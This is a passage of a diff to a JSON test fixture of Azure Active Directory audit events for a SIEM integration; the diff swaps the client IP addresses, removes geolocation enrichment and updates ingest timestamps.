"Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -16267,7 +14845,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -16381,7 +14959,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -16393,12 +14971,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036515100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125291600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -16424,25 +15002,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -16456,7 +15016,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -16579,7 +15139,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -16591,12 +15151,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036519500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125297300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -16622,25 +15182,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -16654,7 +15196,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -16777,7 +15319,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -16789,12 +15331,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036523800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@